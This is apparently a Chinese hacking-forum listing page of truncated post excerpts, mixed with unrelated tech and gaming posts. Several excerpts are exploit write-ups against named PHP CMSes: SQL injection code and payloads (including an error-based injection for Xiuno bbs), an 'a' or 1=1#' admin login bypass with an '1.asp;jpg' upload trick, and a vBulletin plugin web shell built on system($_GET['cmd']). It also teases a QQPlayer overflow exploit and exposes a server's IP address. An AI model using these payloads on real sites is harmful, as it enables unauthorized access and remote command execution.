看到各位大牛为了为了版主拼命挖洞,不知不觉带动了偶熄灭已久的基情。 在网上查了下,貌似没有这个程序的漏洞信息,就发出来交流学习,反正偶也要洞木
查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法
首先,CDN、负载均衡、反向代理还分为很多层,有时查出来的是最外层的 CDN 服务器群,真实的机器是不对外开放的,类似这样的: 用户 → CDN 网络 → 一台或多
IIS 文件名解析漏洞扼要分析
IIS文件名解析漏洞扼要分析 作者: golds7n 交流: daemon[at]t00ls.net 概括: 从技术角度分析IIS6文件名解析漏洞的原理与IIS7的相关情况。 a.IIS6错误解析文件类
126cms后台登陆注入漏洞
By:Cond0r 看代码。。 以下是引用片段: ……若干…… if( !$postdb["userid"] || !$postdb["pwd"] ) { echo "<div align=\"center\" class=\"style1\">"; echo "您输入的用户名或密码有误!!!"; echo "</div>"; exit; } $postdb["pwd"]=md5($postdb["pwd"]); $query="SELECT * FROM `w6_admin` WHERE `userid` ='".$postdb["userid"]."'";
要哇导航网建站系统 v3.2 注入漏洞
By:Cond0r 继续看代码。。 search.php: $keyword=$_GET['keyword']; /*$keyword = trim(iconv('UTF-8', 'GBK', (empty($_GET['keyword'])) ? '' : $_GET['keyword']));*/ if (empty($keyword)) { ?> …省略若干…… $key = 0; // 找站点 $rs = app_db::select('ylmf_site', 'name, url, namecolor, class', "name LIKE BINARY '%$keyword%' LIMIT 100"); //
歪酷CMS v1.0 注入漏洞
By:Cond0r 随便打开一个代码文件就发现了。。 看代码 以下是引用片段: …省略若干代码……… public function index() { //读取数据库&判断 $type = M('type');
狂盗小说小偷 GET Shell 漏洞
By:Cond0r 很傻比的一漏洞 必须开启缓存才能利用 先看代码 book.php: $kd_cachedir = "./cache"; if($kd_book_cache=="ture"){/
超牛逼的游戏引擎:Outerra 引擎,能够从太空到陆地无缝渲染!
超级引擎 Outerra引擎越野测试 斯洛伐克的技术宅学生们表示哥们做的引擎“能够从太空到陆地无缝渲染”,学生自制超级游戏引擎,无缝渲染,无载入
组图:世界各国一流天才谁更强
同时被普林斯顿大学、哈佛大学、斯坦福大学、麻省理工学院、芝加哥大学和弗吉尼亚大学等六所美国顶尖大学录取,并获得全额奖学金。参加“美国高考”,
程序员技术练级攻略
转自:http://coolshell.cn/articles/4990.html 月光博客6月12日发表了《写给新手程序员的一封信》,翻译自
你确信你了解时间吗?
转自:http://coolshell.cn/articles/5075.html 你还记得“软件真的好难做”中的那个有意思的例子吗?那个例
那些曾伴我走过编程之路的软件
转载:http://coolshell.cn/articles/5576.html 收家的时候发现了一张VC++6.0的光盘,实然引发了我的
深入理解C语言
转自:http://coolshell.cn/articles/5761.html Dennis Ritchie 过世了,他发明了C语言,一个影响深远并彻底改变世界的计
在Web上运行Linux
转自:http://coolshell.cn/articles/4722.html 一个叫Fabrice Bellard的程序员写了一段Ja
求生之路2 2091版官方完整地图(按剧情顺序排列)
-------------------------------------------------- 地图名
屌炸了!视频: 超级牛人纯手工打造迷你V12发动机 - 世上最小的V12发动机
视频: 超级牛人纯手工打造迷你V12发动机 世上最小的V12发动机 视频: 国外RC V12 发动机 屌炸了!视频: 超级牛人纯手工打造迷你V12发动机,世上最
视频: 你知锁患有多深 几秒钟可撬锁 “锡纸晃匙”
视频: 你知锁患有多深 几秒钟可撬锁 “锡纸晃匙” 锡纸与不同的金属组合,能打开许多锁。 住户门窗完好无损,但家中财物不翼而飞,这是为什么呢?昨日,记
windows2003 x64 提权一点经验
By:hostay 最近看到很多基友遇到x64的版本素手无策,我最开始遇到的时候也折腾了好久,就写一下我提权的过程吧,无技术含量,本人表达能力
修罗(Xiuno 1.0.2) bbs 注入漏洞
By:lostwolf 前段时间爆出 Xiuno bbs 后台拿shell 无意中翻了下代码发现 搜索型注入漏洞(POST) magic_quotes_gpc = Off 获取用户个数 ' AND (SELECT 1600 FROM(SELECT COUNT(*),CONCAT(0x6c6f7374776f6c667e,(SELECT MID((IFNULL(CAST(COUNT(*) AS CHAR),0x20)),1,50) FROM
vBulletin 论坛全版本 后台拿shell
By:y35u 在后台,进插件管理.添加插件. Ajax_complete 填入代码: if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;} 激活mod 访问:www.site.com/forumlocation
汗,8080 端口暴露了 t00ls 服务器信息。
80 端口 8080 端口 域名:www.t00ls.net IP:58.221.59.206 归属地:江苏省南通市 电信 扫描 80 端口: 58.221.59.206 [Unix] {nginx/1.1.2} 58.221.59.206:80 HTTP/1.1 200 OK Nginx (engine x) 是一个
【原创】文艺青年、普通青年、二逼青年的踩贴理由
老衲也随目前主流造句之手法,发个帖子: 文艺青年踩贴理由: 贫道夜观星象,群星惨淡,遂捻指一算,发觉楼主所发此贴之时辰与方位,冲天斥地,乃大
“求生之路2 2077版”升级到“求生之路2 2091版”完整步骤
原帖:http://bbs.3dmgame.com/thread-2158950-1-1.html 以下是引用片段: 三、如果你是v2076~
QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
漏洞类型:远程代码执行 QQ播放器核心版本过低,在处理畸形MOV文件时,缓冲区溢出,可覆盖SEH任意代码执行,不愧为山寨之王。 success_
Php安全新闻早8点(2011-11-23 星期三)
http://hi.baidu.com/micropoor //2011-11-23 星期三 //Cookie篇 /* 序 */ 讲起注入,就要从防住入说起,但防注入一般只对QueryString和Form做了防范,却忽略了Cooki
【入侵卫星】A Brief Overview on Satellite Hacking
A Brief Overview on Satellite Hacking, By Anchises Moraes Guimarães de Paula, iDefense. Information Security, July 2010 I HItb MagazIne 17. As a large portion of worldwide Internet users increasingly rely on satellite communication technologies to connect to the Web, a number of vulnerabilities within these connections actively expose satellites to potential attacks. The implications of such a successful attack are massive, as satellites are the only means of broadcasting
远程控制木马:按一次空格木马就执行一次
远程控制木马:按一次空格木马就执行一次 昨日,金山毒霸云安全捕获到一类远程控制木马,木马使用空格作为快捷键,按一次空格,木马就执行一次,当木马
2taoke 2.2 注入漏洞
By:Cond0r function tao_check($string){ if(!is_array($string)) return addslashes(trim($string)); foreach($string as $k => $v) $string[$k] = tao_check($v); return $string; if($_REQUEST){ if(get_magic_quotes_gpc()){ $_REQUEST = tao_strip($_REQUEST); }else{ $_POST = tao_check($_POST); $_GET = tao_check($_GET); @extract($_POST); @extract($_GET); } $_REQUEST=filter_xss($_REQUEST, ALLOWED_HTMLTAGS); @extract($_REQUEST); 只做了简单的简单的过
冰山信息发布系统后台登陆漏洞
By:z2681 闲话蛋说 默认后台为 admin 可直接利用 a' or 1=1# php万能密码进后台 后台有上传 直接上传 1.asp;jpg 点击查看原文件可知路径 大牛误喷!口下积德!
Php安全新闻早8点(2011-11-22 星期二)
http://hi.baidu.com/micropoor //2011-11-22 星期二 //插入篇----Php程序员角度看安全 //今天全局我们站在Php程序员的角度看待问题 //以及解决问题 结论:一切的输入都是有害的